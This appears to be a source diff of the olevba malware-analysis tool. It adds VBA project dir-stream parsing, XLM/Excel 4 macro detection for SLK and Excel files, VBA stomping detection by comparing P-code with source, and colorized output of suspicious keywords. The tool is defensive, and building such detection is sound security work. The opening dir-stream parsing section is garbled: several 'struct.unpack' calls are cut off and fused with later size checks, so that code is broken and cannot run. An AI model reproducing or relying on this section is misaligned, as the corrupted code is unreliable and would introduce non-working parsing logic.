+ def __init__(self, ole, vba_root, project_path, dir_path, relaxed=False):
+ """
+ Extract VBA macros from an OleFileIO object.
+
+ :param vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
+ :param project_path: path to the PROJECT stream
+ :param relaxed: If True, only create info/debug log entry if data is not as expected
+ (e.g. opening substream fails); if False, raise an error in this case
+ """
+ self.ole = ole
+ self.vba_root = vba_root
+ self.project_path = project_path
+ self.dir_path = dir_path
+ self.relaxed = relaxed
+ #: VBA modules contained in the project (list of VBA_Module objects)
+ self.modules = []
+ #: file extension for each VBA module
+ self.module_ext = {}
+ log.debug('Parsing the dir stream from %r' % dir_path)
+ # read data from dir stream (compressed)
+ dir_compressed = ole.openstream(dir_path).read()
+ # decompress it:
+ dir_stream = BytesIO(decompress_stream(bytearray(dir_compressed)))
+ # store reference for later use:
+ self.dir_stream = dir_stream
+
+ # reference: MS-VBAL 2.3.4.2 dir Stream: Version Independent Project Information
+
+ # PROJECTSYSKIND Record
+ # Specifies the platform for which the VBA project is created.
+ projectsyskind_id = struct.unpack(" 128:
+ # TODO: raise an actual error? What is MS Office's behaviour?
+ log.error("PROJECTNAME_SizeOfProjectName value not in range [1-128]: {0}".format(sizeof_projectname))
+ projectname_bytes = dir_stream.read(sizeof_projectname)
+ self.projectname = self.decode_bytes(projectname_bytes)
+
+
+ # PROJECTDOCSTRING Record
+ # Specifies the description for the VBA project.
+ projectdocstring_id = struct.unpack(" 2000:
+ log.error(
+ "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
+ # DocString (variable): An array of SizeOfDocString bytes that specifies the description for the VBA project.
+ # MUST contain MBCS characters encoded using the code page specified in PROJECTCODEPAGE (section 2.3.4.2.1.4).
+ # MUST NOT contain null characters.
+ docstring_bytes = dir_stream.read(projectdocstring_sizeof_docstring)
+ self.docstring = self.decode_bytes(docstring_bytes)
+ projectdocstring_reserved = struct.unpack(" 260:
+ log.error(
+ "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
+ projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
+ projecthelpfilepath_reserved = struct.unpack(" 1015:
+ log.error(
+ "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
+ projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
+ projectconstants_reserved = struct.unpack(" -1:
stripped_data = stripped_data[content_offset:]
# TODO: quick and dirty fix: insert a standard line with MIME-Version header?
- mhtml = email.message_from_string(stripped_data)
+ # monkeypatch email to fix issue #32:
+ # allow header lines without ":"
+ oldHeaderRE = copy(email.feedparser.headerRE)
+ loosyHeaderRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
+ email.feedparser.headerRE = loosyHeaderRE
+ if PYTHON2:
+ mhtml = email.message_from_string(stripped_data)
+ else:
+ # on Python 3, need to use message_from_bytes instead:
+ mhtml = email.message_from_bytes(stripped_data)
+ email.feedparser.headerRE = oldHeaderRE
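The monkeypatch above widens `email.feedparser.headerRE` because some MHT samples contain header-like lines without a colon, which abort parsing with the strict pattern. A quick check of why the `:?` substitution matters (the strict pattern shown mirrors the 2.7-era `email.feedparser` one):

```python
import re

# strict pattern: the field name must be followed by a colon
strict_headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:|[\t ])')
# loosened pattern used in the patch: the colon becomes optional
loose_headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')

bad_header = 'MIME-Version 1.0'        # malformed: no colon
good_header = 'Content-Type: text/html'

# the strict pattern rejects the malformed line, the loose one accepts it
assert strict_headerRE.match(bad_header) is None
assert loose_headerRE.match(bad_header) is not None
```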
# find all the attached files:
for part in mhtml.walk():
content_type = part.get_content_type() # always returns a value
@@ -2505,7 +2966,7 @@ def open_mht(self, data):
# using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
# decompress the zlib data starting at offset 0x32, which is the OLE container:
# check ActiveMime header:
- if isinstance(part_data, str) and is_mso_file(part_data):
+ if isinstance(part_data, bytes) and is_mso_file(part_data):
log.debug('Found ActiveMime header, decompressing MSO container')
try:
ole_data = mso_file_extract(part_data)
@@ -2567,6 +3028,40 @@ def open_ppt(self):
log.debug("File appears not to be a ppt file (%s)" % exc)
+ def open_slk(self, data):
+ """
+ Open a SLK file, which may contain XLM/Excel 4 macros
+ :param data: file contents in a bytes string
+ :return: nothing
+ """
+ # TODO: Those results should be stored as XLM macros, not VBA
+ log.info('Opening SLK file %s' % self.filename)
+ xlm_macro_found = False
+ xlm_macros = []
+ xlm_macros.append('Formulas and XLM/Excel 4 macros extracted from SLK file:')
+ for line in data.splitlines():

+ if line.startswith(b'O'):
+ # Option: "O;E" indicates a macro sheet, must appear before NN and C rows
+ for s in line.split(b';'):
+ if s.startswith(b'E'):
+ xlm_macro_found = True
+ log.debug('SLK parser: found macro sheet')
+ elif line.startswith(b'NN') and xlm_macro_found:
+ # Name that can trigger a macro, for example "Auto_Open"
+ for s in line.split(b';'):
+ if s.startswith(b'N') and s.strip() != b'NN':
+ xlm_macros.append('Named cell: %s' % bytes2str(s[1:]))
+ elif line.startswith(b'C') and xlm_macro_found:
+ # Cell
+ for s in line.split(b';'):
+ if s.startswith(b'E'):
+ xlm_macros.append('Formula or Macro: %s' % bytes2str(s[1:]))
+ if xlm_macro_found:
+ self.contains_macros = True
+ self.xlm_macros = xlm_macros
+ self.type = TYPE_SLK
+
+
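`open_slk` above keys off SLK record prefixes: an `O;E` option record marks a macro sheet, `NN` records carry names that can auto-trigger macros (e.g. `Auto_Open`), and `C;E...` records hold formulas. A self-contained re-implementation of that scan on a synthetic SLK snippet (the sample data is made up for illustration):

```python
def scan_slk(data):
    """Minimal sketch of the SLK scan above: returns (macro_sheet, findings)."""
    macro_sheet = False
    findings = []
    for line in data.splitlines():
        if line.startswith(b'O'):
            # Option record: "O;E" flags a macro sheet
            if any(s.startswith(b'E') for s in line.split(b';')):
                macro_sheet = True
        elif line.startswith(b'NN') and macro_sheet:
            # Named cell, e.g. the Auto_Open trigger
            for s in line.split(b';'):
                if s.startswith(b'N') and s.strip() != b'NN':
                    findings.append(('named_cell', s[1:]))
        elif line.startswith(b'C') and macro_sheet:
            # Cell record: "E" fields hold formulas/macros
            for s in line.split(b';'):
                if s.startswith(b'E'):
                    findings.append(('formula', s[1:]))
    return macro_sheet, findings

sample = b'ID;P\nO;E\nNN;NAuto_Open;ER1C1\nC;X1;Y1;EEXEC("cmd")\n'
```

Note that, as in the patch, `C` and `NN` records are only reported once a macro sheet has been seen, so plain data-only SLK files yield no findings.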
def open_text(self, data):
"""
Open a text file containing VBA or VBScript source code
@@ -2575,7 +3070,9 @@ def open_text(self, data):
"""
log.info('Opening text file %s' % self.filename)
# directly store the source code:
- self.vba_code_all_modules = data
+ # On Python 2, store it as a raw bytes string
+ # On Python 3, convert it to unicode assuming it was encoded with UTF-8
+ self.vba_code_all_modules = bytes2str(data)
self.contains_macros = True
# set type only if parsing succeeds
self.type = TYPE_TEXT
@@ -2698,6 +3195,7 @@ def detect_vba_macros(self):
# if OpenXML/PPT, check all the OLE subfiles:
if self.ole_file is None:
for ole_subfile in self.ole_subfiles:
+ ole_subfile.no_xlm = self.no_xlm
if ole_subfile.detect_vba_macros():
self.contains_macros = True
return True
@@ -2731,7 +3229,7 @@ def detect_vba_macros(self):
log.debug('%r...[much more data]...%r' % (data[:100], data[-50:]))
else:
log.debug(repr(data))
- if 'Attribut' in data:
+ if b'Attribut\x00' in data:
log.debug('Found VBA compressed code')
self.contains_macros = True
except IOError as exc:
@@ -2740,8 +3238,59 @@ def detect_vba_macros(self):
log.debug('Trace:', exc_info=True)
else:
raise SubstreamOpenError(self.filename, d.name, exc)
+ if (not self.no_xlm) and self.detect_xlm_macros():
+ self.contains_macros = True
return self.contains_macros
+ def detect_xlm_macros(self):
+ # if this is a SLK file, the analysis was done in open_slk:
+ if self.type == TYPE_SLK:
+ return self.contains_macros
+ from oletools.thirdparty.oledump.plugin_biff import cBIFF
+ self.xlm_macros = []
+ if self.ole_file is None:
+ return False
+ for excel_stream in ('Workbook', 'Book'):
+ if self.ole_file.exists(excel_stream):
+ log.debug('Found Excel stream %r' % excel_stream)
+ data = self.ole_file.openstream(excel_stream).read()
+ log.debug('Running BIFF plugin from oledump')
+ try:
+ # starting from plugin_biff 0.0.12, we use the CSV output (-c) instead of -x
+ # biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-x')
+ # First let's get the list of boundsheets, and check if there are Excel 4 macros:
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o BOUNDSHEET')
+ self.xlm_macros = biff_plugin.Analyze()
+ if "Excel 4.0 macro sheet" in '\n'.join(self.xlm_macros):
+ log.debug('Found XLM macros')
+ # get the list of labels, which may contain the "Auto_Open" trigger
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o LABEL -r LN')
+ self.xlm_macros += biff_plugin.Analyze()
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-c -r LN')
+ self.xlm_macros += biff_plugin.Analyze()
+ # we run plugin_biff again, this time to search DCONN objects and get their URLs, if any:
+ # ref: https://inquest.net/blog/2020/03/18/Getting-Sneakier-Hidden-Sheets-Data-Connections-and-XLM-Macros
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o DCONN -s')
+ self.xlm_macros += biff_plugin.Analyze()
+ return True
+ except Exception:
+ log.exception('Error when running oledump.plugin_biff, please report to %s' % URL_OLEVBA_ISSUES)
+ return False
+
+
+ def encode_string(self, unicode_str):
+ """
+ Encode a unicode string to bytes or str, using the specified encoding
+ for the VBA_parser. By default, it will be bytes/UTF-8 on Python 2, and
+ a normal unicode string on Python 3.
+ :param str unicode_str: string to be encoded
+ :return: encoded string
+ """
+ if self.encoding is None:
+ return unicode_str
+ else:
+ return unicode_str.encode(self.encoding, errors='replace')
+
def extract_macros(self):
"""
Extract and decompress source code for each VBA macro found in the file
@@ -2758,6 +3307,12 @@ def extract_macros(self):
if self.type == TYPE_TEXT:
# This is a text file, yield the full code:
yield (self.filename, '', self.filename, self.vba_code_all_modules)
+ elif self.type == TYPE_SLK:
+ if self.xlm_macros:
+ vba_code = ''
+ for line in self.xlm_macros:
+ vba_code += "' " + line + '\n'
+ yield ('xlm_macro', 'xlm_macro', 'xlm_macro.txt', vba_code)
else:
# OpenXML/PPT: recursively yield results from each OLE subfile:
for ole_subfile in self.ole_subfiles:
@@ -2798,18 +3353,33 @@ def extract_macros(self):
# read data
log.debug('Reading data from stream %r' % d.name)
data = ole._open(d.isectStart, d.size).read()
- for match in re.finditer(r'\x00Attribut[^e]', data, flags=re.IGNORECASE):
+ for match in re.finditer(b'\\x00Attribut[^e]', data, flags=re.IGNORECASE):
start = match.start() - 3
log.debug('Found VBA compressed code at index %X' % start)
compressed_code = data[start:]
try:
- vba_code = decompress_stream(compressed_code)
+ vba_code = decompress_stream(bytearray(compressed_code))
+ # TODO vba_code = self.encode_string(vba_code)
yield (self.filename, d.name, d.name, vba_code)
except Exception as exc:
# display the exception with full stack trace for debugging
log.debug('Error processing stream %r in file %r (%s)' % (d.name, self.filename, exc))
log.debug('Traceback:', exc_info=True)
# do not raise the error, as it is unlikely to be a compressed macro stream
+ if self.xlm_macros:
+ vba_code = ''
+ for line in self.xlm_macros:
+ vba_code += "' " + line + '\n'
+ yield ('xlm_macro', 'xlm_macro', 'xlm_macro.txt', vba_code)
+ # Analyse the VBA P-code to detect VBA stomping:
+ # If stomping is detected, add a fake VBA module with the P-code as source comments
+ # so that VBA_Scanner can find keywords and IOCs in it
+ if self.detect_vba_stomping():
+ vba_code = ''
+ for line in self.pcodedmp_output.splitlines():
+ vba_code += "' " + line + '\n'
+ yield ('VBA P-code', 'VBA P-code', 'VBA_P-code.txt', vba_code)
+
def extract_all_macros(self):
"""
@@ -2831,6 +3401,8 @@ def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
"""
runs extract_macros and analyze the source code of all VBA macros
found in the file.
+ All results are stored in self.analysis_results.
+ If called more than once, simply returns the previous results.
"""
if self.detect_vba_macros():
# if the analysis was already done, avoid doing it twice:
@@ -2847,6 +3419,13 @@ def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
# Analyze the whole code at once:
scanner = VBA_Scanner(self.vba_code_all_modules)
self.analysis_results = scanner.scan(show_decoded_strings, deobfuscate)
+ if self.detect_vba_stomping():
+ log.debug('adding VBA stomping to suspicious keywords')
+ keyword = 'VBA Stomping'
+ description = 'VBA Stomping was detected: the VBA source code and P-code are different, '\
+ 'this may have been used to hide malicious code'
+ scanner.suspicious_keywords.append((keyword, description))
+ scanner.results.append(('Suspicious', keyword, description))
autoexec, suspicious, iocs, hexstrings, base64strings, dridex, vbastrings = scanner.scan_summary()
self.nb_autoexec += autoexec
self.nb_suspicious += suspicious
@@ -2958,11 +3537,12 @@ def extract_form_strings(self):
"""
Extract printable strings from each VBA Form found in the file
- Iterator: yields (filename, stream_path, vba_filename, vba_code) for each VBA macro found
+ Iterator: yields (filename, stream_path, form_string) for each printable string found in forms
If the file is OLE, filename is the path of the file.
If the file is OpenXML, filename is the path of the OLE subfile containing VBA macros
within the zip archive, e.g. word/vbaProject.bin.
If the file is PPT, result is as for OpenXML but filename is useless
+ Note: form_string is a raw bytes string on Python 2, a unicode str on Python 3
"""
if self.ole_file is None:
# This may be either an OpenXML/PPT or a text file:
@@ -2985,8 +3565,186 @@ def extract_form_strings(self):
# Extract printable strings from the form object stream "o":
for m in re_printable_string.finditer(form_data):
log.debug('Printable string found in form: %r' % m.group())
- yield (self.filename, '/'.join(o_stream), m.group())
+ # On Python 3, convert bytes string to unicode str:
+ if PYTHON2:
+ found_str = m.group()
+ else:
+ found_str = m.group().decode('utf8', errors='replace')
+ if found_str != 'Tahoma':
+ yield (self.filename, '/'.join(o_stream), found_str)
+
+ def extract_form_strings_extended(self):
+ if self.ole_file is None:
+ # This may be either an OpenXML/PPT or a text file:
+ if self.type == TYPE_TEXT:
+ # This is a text file, return no results:
+ return
+ else:
+ # OpenXML/PPT: recursively yield results from each OLE subfile:
+ for ole_subfile in self.ole_subfiles:
+ for results in ole_subfile.extract_form_strings_extended():
+ yield results
+ else:
+ # This is an OLE file:
+ self.find_vba_forms()
+ ole = self.ole_file
+ for form_storage in self.vba_forms:
+ for variable in oleform.extract_OleFormVariables(ole, form_storage):
+ yield (self.filename, '/'.join(form_storage), variable)
+ def extract_pcode(self):
+ """
+ Extract and disassemble the VBA P-code, using pcodedmp
+
+ :return: VBA P-code disassembly
+ :rtype: str
+ """
+ # Text and SLK files cannot be stomped:
+ if self.type in (TYPE_SLK, TYPE_TEXT):
+ self.pcodedmp_output = ''
+ return ''
+ # only run it once:
+ if self.pcodedmp_output is None:
+ log.debug('Calling pcodedmp to extract and disassemble the VBA P-code')
+ # import pcodedmp here to avoid circular imports:
+ try:
+ from pcodedmp import pcodedmp
+ except Exception as e:
+ # This may happen with Pypy, because pcodedmp imports win_unicode_console...
+ # TODO: this is a workaround, we just ignore P-code
+ # TODO: here we just use log.info, because the word "error" in the output makes some of the tests fail...
+ log.info('Exception when importing pcodedmp: {}'.format(e))
+ self.pcodedmp_output = ''
+ return ''
+ # logging is disabled after importing pcodedmp, need to re-enable it
+ # This is because pcodedmp imports olevba again :-/
+ # TODO: here it works only if logging was enabled, need to change pcodedmp!
+ enable_logging()
+ # pcodedmp prints all its output to sys.stdout, so we need to capture it so that
+ # we can process the results later on.
+ # save sys.stdout, then modify it to capture pcodedmp's output:
+ # stdout = sys.stdout
+ if PYTHON2:
+ # on Python 2, console output is bytes
+ output = BytesIO()
+ else:
+ # on Python 3, console output is unicode
+ output = StringIO()
+ # sys.stdout = output
+ # we need to fake an argparser for those two args used by pcodedmp:
+ class args:
+ disasmOnly = True
+ verbose = False
+ try:
+ # TODO: handle files in memory too
+ log.debug('before pcodedmp')
+ # TODO: we just ignore pcodedmp errors
+ stderr = sys.stderr
+ sys.stderr = output
+ pcodedmp.processFile(self.filename, args, output_file=output)
+ sys.stderr = stderr
+ log.debug('after pcodedmp')
+ except Exception as e:
+ # print('Error while running pcodedmp: {}'.format(e), file=sys.stderr, flush=True)
+ # set sys.stdout back to its original value
+ # sys.stdout = stdout
+ log.exception('Error while running pcodedmp')
+ # finally:
+ # # set sys.stdout back to its original value
+ # sys.stdout = stdout
+ self.pcodedmp_output = output.getvalue()
+ # print(self.pcodedmp_output)
+ # log.debug(self.pcodedmp_output)
+ return self.pcodedmp_output
+
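`extract_pcode` above captures pcodedmp's console output by swapping `sys.stdout`/`sys.stderr` by hand (the commented-out lines show earlier attempts). On Python 3 the same capture can be written with `contextlib.redirect_stdout`; this is a sketch of the pattern, not what the patch uses, since the patch still supports Python 2 where `redirect_stdout` does not exist:

```python
import io
from contextlib import redirect_stdout  # Python 3 only

buf = io.StringIO()
with redirect_stdout(buf):
    # stands in for pcodedmp.processFile(), which prints to sys.stdout
    print('Line #1:')
    print('\tFuncDefn (Sub AutoOpen())')
captured = buf.getvalue()
```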
+ def detect_vba_stomping(self):
+ """
+ Detect VBA stomping, by comparing the keywords present in the P-code and
+ in the VBA source code.
+
+ :return: True if VBA stomping detected, False otherwise
+ :rtype: bool
+ """
+ log.debug('detect_vba_stomping')
+ # only run it once:
+ if self.vba_stomping_detected is not None:
+ return self.vba_stomping_detected
+ # Text and SLK files cannot be stomped:
+ if self.type in (TYPE_SLK, TYPE_TEXT):
+ self.vba_stomping_detected = False
+ return False
+ # TODO: Files in memory cannot be analysed with pcodedmp yet
+ if not self.file_on_disk:
+ log.warning('For now, VBA stomping cannot be detected for files in memory')
+ self.vba_stomping_detected = False
+ return False
+ # only run it once:
+ if self.vba_stomping_detected is None:
+ log.debug('Analysing the P-code to detect VBA stomping')
+ self.extract_pcode()
+ # print('pcodedmp OK')
+ log.debug('pcodedmp OK')
+ # process the output to extract keywords, to detect VBA stomping
+ keywords = set()
+ for line in self.pcodedmp_output.splitlines():
+ if line.startswith('\t'):
+ log.debug('P-code: ' + line.strip())
+ tokens = line.split(None, 1)
+ mnemonic = tokens[0]
+ args = ''
+ if len(tokens) == 2:
+ args = tokens[1].strip()
+ # log.debug(repr([mnemonic, args]))
+ # if mnemonic in ('VarDefn',):
+ # # just add the rest of the line
+ # keywords.add(args)
+ # if mnemonic == 'FuncDefn':
+ # # function definition: just strip parentheses
+ # funcdefn = args.strip('()')
+ # keywords.add(funcdefn)
+ if mnemonic in ('ArgsCall', 'ArgsLd', 'St', 'Ld', 'MemSt', 'Label'):
+ # sometimes ArgsCall is followed by "(Call)", if so we remove it (issue #489)
+ if args.startswith('(Call) '):
+ args = args[7:]
+ # add 1st argument:
+ name = args.split(None, 1)[0]
+ # sometimes pcodedmp reports names like "id_FFFF", which are not
+ # directly present in the VBA source code
+ # (for example "Me" in VBA appears as id_FFFF in P-code)
+ if not name.startswith('id_'):
+ keywords.add(name)
+ if mnemonic == 'LitStr':
+ # re_string = re.compile(r'\"([^\"]|\"\")*\"')
+ # for match in re_string.finditer(line):
+ # print('\t' + match.group())
+ # the string is the 2nd argument:
+ s = args.split(None, 1)[1]
+ # tricky issue: when a string contains double quotes inside,
+ # pcodedmp returns a single ", whereas in the VBA source code
+ # it is always a double "".
+ # We have to remove the " around the strings, then double the remaining ",
+ # and put back the " around:
+ if len(s) >= 2:
+ assert s[0] == '"' and s[-1] == '"'
+ s = s[1:-1]
+ s = s.replace('"', '""')
+ s = '"' + s + '"'
+ keywords.add(s)
+ log.debug('Keywords extracted from P-code: ' + repr(sorted(keywords)))
+ self.vba_stomping_detected = False
+ # TODO: add a method to get all VBA code as one string
+ vba_code_all_modules = ''
+ for (_, _, _, vba_code) in self.extract_all_macros():
+ vba_code_all_modules += vba_code + '\n'
+ for keyword in keywords:
+ if keyword not in vba_code_all_modules:
+ log.debug('Keyword {!r} not found in VBA code'.format(keyword))
+ log.debug('VBA STOMPING DETECTED!')
+ self.vba_stomping_detected = True
+ break
+ if not self.vba_stomping_detected:
+ log.debug('No VBA stomping detected.')
+ return self.vba_stomping_detected
def close(self):
"""
@@ -3016,11 +3774,11 @@ def __init__(self, *args, **kwargs):
super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
- def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
+ def run_analysis(self, show_decoded_strings=False, deobfuscate=False):
"""
- Analyze the provided VBA code, and print the results in a table
+ Analyze the provided VBA code without printing the results (yet).
+ All results are stored in self.analysis_results.
- :param vba_code: str, VBA source code to be analyzed
:param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
:param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
:return: None
@@ -3029,21 +3787,37 @@ def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
if sys.stdout.isatty():
print('Analysis...\r', end='')
sys.stdout.flush()
- results = self.analyze_macros(show_decoded_strings, deobfuscate)
+ self.analyze_macros(show_decoded_strings, deobfuscate)
+
+
+ def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
+ """
+ print the analysis results in a table
+
+ :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
+ :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
+ :return: None
+ """
+ results = self.analysis_results
if results:
- t = prettytable.PrettyTable(('Type', 'Keyword', 'Description'))
- t.align = 'l'
- t.max_width['Type'] = 10
- t.max_width['Keyword'] = 20
- t.max_width['Description'] = 39
+ t = tablestream.TableStream(column_width=(10, 20, 45),
+ header_row=('Type', 'Keyword', 'Description'))
+ COLOR_TYPE = {
+ 'AutoExec': 'yellow',
+ 'Suspicious': 'red',
+ 'IOC': 'cyan',
+ }
for kw_type, keyword, description in results:
# handle non printable strings:
if not is_printable(keyword):
keyword = repr(keyword)
if not is_printable(description):
description = repr(description)
- t.add_row((kw_type, keyword, description))
- print(t)
+ color_type = COLOR_TYPE.get(kw_type, None)
+ t.write_row((kw_type, keyword, description), colors=(color_type, None, None))
+ t.close()
+ if self.vba_stomping_detected:
+ print('VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues')
else:
print('No suspicious keyword or IOC found.')
@@ -3064,10 +3838,29 @@ def print_analysis_json(self, show_decoded_strings=False, deobfuscate=False):
return [dict(type=kw_type, keyword=keyword, description=description)
for kw_type, keyword, description in self.analyze_macros(show_decoded_strings, deobfuscate)]
+ def colorize_keywords(self, vba_code):
+ """
+ Colorize keywords found during the VBA code analysis
+ :param vba_code: str, VBA code to be colorized
+ :return: str, VBA code including color tags for Colorclass
+ """
+ results = self.analysis_results
+ if results:
+ COLOR_TYPE = {
+ 'AutoExec': 'yellow',
+ 'Suspicious': 'red',
+ 'IOC': 'cyan',
+ }
+ for kw_type, keyword, description in results:
+ color_type = COLOR_TYPE.get(kw_type, None)
+ if color_type:
+ vba_code = vba_code.replace(keyword, '{auto%s}%s{/%s}' % (color_type, keyword, color_type))
+ return vba_code
+
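`colorize_keywords` above wraps each keyword found by the analysis in colorclass-style `{autoCOLOR}...{/COLOR}` tags. Since the tagging is plain string substitution, it can be exercised without colorclass itself; a minimal sketch mirroring the method:

```python
COLOR_TYPE = {
    'AutoExec': 'yellow',
    'Suspicious': 'red',
    'IOC': 'cyan',
}

def colorize(vba_code, results):
    """Wrap each analysis keyword in colorclass-style tags (illustrative)."""
    for kw_type, keyword, _description in results:
        color = COLOR_TYPE.get(kw_type)
        if color:
            vba_code = vba_code.replace(
                keyword, '{auto%s}%s{/%s}' % (color, keyword, color))
    return vba_code

out = colorize('Shell cmd', [('Suspicious', 'Shell', 'may run an executable')])
# → '{autored}Shell{/red} cmd'
```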
def process_file(self, show_decoded_strings=False,
display_code=True, hide_attributes=True,
vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
+ deobfuscate=False, pcode=False, no_xlm=False):
"""
Process a single file
@@ -3079,9 +3872,12 @@ def process_file(self, show_decoded_strings=False,
otherwise each module is analyzed separately (old behaviour)
:param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
:param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
+ :param pcode: bool, if True call pcodedmp to disassemble the P-code and display it
+ :param no_xlm: bool, if True don't use the BIFF plugin to extract old-style XLM macros
"""
#TODO: replace print by writing to a provided output file (sys.stdout by default)
# fix conflicting parameters:
+ self.no_xlm = no_xlm
if vba_code_only and not display_code:
display_code = True
if self.container:
@@ -3094,6 +3890,8 @@ def process_file(self, show_decoded_strings=False,
#TODO: handle olefile errors, when an OLE file is malformed
print('Type: %s'% self.type)
if self.detect_vba_macros():
+ # run analysis before displaying VBA code, in order to colorize found keywords
+ self.run_analysis(show_decoded_strings=show_decoded_strings, deobfuscate=deobfuscate)
#print 'Contains VBA Macros:'
for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
if hide_attributes:
@@ -3110,12 +3908,60 @@ def process_file(self, show_decoded_strings=False,
if vba_code_filtered.strip() == '':
print('(empty macro)')
else:
+ # check if the VBA code contains special characters such as backspace (issue #358)
+ if '\x08' in vba_code_filtered:
+ log.warning('The VBA code contains special characters such as backspace, that may be used for obfuscation.')
+ if sys.stdout.isatty():
+ # if the standard output is the console, we'll display colors
+ backspace = colorclass.Color(b'{autored}\\x08{/red}')
+ else:
+ backspace = '\\x08'
+ # replace backspace by "\x08" for display
+ vba_code_filtered = vba_code_filtered.replace('\x08', backspace)
+ try:
+ # Colorize the interesting keywords in the output:
+ # (unless the output is redirected to a file)
+ if sys.stdout.isatty():
+ vba_code_filtered = colorclass.Color(self.colorize_keywords(vba_code_filtered))
+ except UnicodeError:
+ # TODO better handling of Unicode
+ log.error('Unicode conversion to be fixed before colorizing the output')
print(vba_code_filtered)
for (subfilename, stream_path, form_string) in self.extract_form_strings():
+ if form_string is not None:
+ print('-' * 79)
+ print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
+ print('- ' * 39)
+ print(form_string)
+ try:
+ for (subfilename, stream_path, form_variables) in self.extract_form_strings_extended():
+ if form_variables is not None:
+ print('-' * 79)
+ print('VBA FORM Variable "%s" IN %r - OLE stream: %r' % (form_variables['name'], subfilename, stream_path))
+ print('- ' * 39)
+ print(str(form_variables['value']))
+ except Exception as exc:
+ # display the exception with full stack trace for debugging
+ log.info('Error parsing form: %s' % exc)
+ log.debug('Traceback:', exc_info=True)
+ if pcode:
print('-' * 79)
- print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
- print('- ' * 39)
- print(form_string)
+ print('P-CODE disassembly:')
+ pcode = self.extract_pcode()
+ print(pcode)
+ # if self.type == TYPE_SLK:
+ # # TODO: clean up this code
+ # slk_output = self.vba_code_all_modules
+ # try:
+ # # Colorize the interesting keywords in the output:
+ # # (unless the output is redirected to a file)
+ # if sys.stdout.isatty():
+ # slk_output = colorclass.Color(self.colorize_keywords(slk_output))
+ # except UnicodeError:
+ # # TODO better handling of Unicode
+ # log.debug('Unicode conversion to be fixed before colorizing the output')
+ # print(slk_output)
+
if not vba_code_only:
# analyse the code from all modules at once:
self.print_analysis(show_decoded_strings, deobfuscate)
@@ -3129,6 +3975,7 @@ def process_file(self, show_decoded_strings=False,
except Exception as exc:
# display the exception with full stack trace for debugging
log.info('Error processing file %s (%s)' % (self.filename, exc))
+ traceback.print_exc()
log.debug('Traceback:', exc_info=True)
raise ProcessingError(self.filename, exc)
print('')
@@ -3137,7 +3984,7 @@ def process_file(self, show_decoded_strings=False,
def process_file_json(self, show_decoded_strings=False,
display_code=True, hide_attributes=True,
vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
+ deobfuscate=False, no_xlm=False):
"""
Process a single file
@@ -3154,6 +4001,7 @@ def process_file_json(self, show_decoded_strings=False,
"""
#TODO: fix conflicting parameters (?)
+ self.no_xlm = no_xlm
if vba_code_only and not display_code:
display_code = True
@@ -3207,7 +4055,7 @@ def process_file_json(self, show_decoded_strings=False,
return result
- def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
+ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False, no_xlm=False):
"""
Process a file in triage mode, showing only summary results on one line.
"""
@@ -3236,16 +4084,6 @@ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
line = '%-12s %s' % (flags, self.filename)
print(line)
-
- # old table display:
- # macros = autoexec = suspicious = iocs = hexstrings = 'no'
- # if nb_macros: macros = 'YES:%d' % nb_macros
- # if nb_autoexec: autoexec = 'YES:%d' % nb_autoexec
- # if nb_suspicious: suspicious = 'YES:%d' % nb_suspicious
- # if nb_iocs: iocs = 'YES:%d' % nb_iocs
- # if nb_hexstrings: hexstrings = 'YES:%d' % nb_hexstrings
- # # 2nd line = info
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % (self.type, macros, autoexec, suspicious, iocs, hexstrings)
except Exception as exc:
# display the exception with full stack trace for debugging only
log.debug('Error processing file %s (%s)' % (self.filename, exc),
@@ -3253,26 +4091,11 @@ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
raise ProcessingError(self.filename, exc)
- # t = prettytable.PrettyTable(('filename', 'type', 'macros', 'autoexec', 'suspicious', 'ioc', 'hexstrings'),
- # header=False, border=False)
- # t.align = 'l'
- # t.max_width['filename'] = 30
- # t.max_width['type'] = 10
- # t.max_width['macros'] = 6
- # t.max_width['autoexec'] = 6
- # t.max_width['suspicious'] = 6
- # t.max_width['ioc'] = 6
- # t.max_width['hexstrings'] = 6
- # t.add_row((filename, ftype, macros, autoexec, suspicious, iocs, hexstrings))
- # print t
-
-
#=== MAIN =====================================================================
-def main():
- """
- Main function, called when olevba is run from the command line
- """
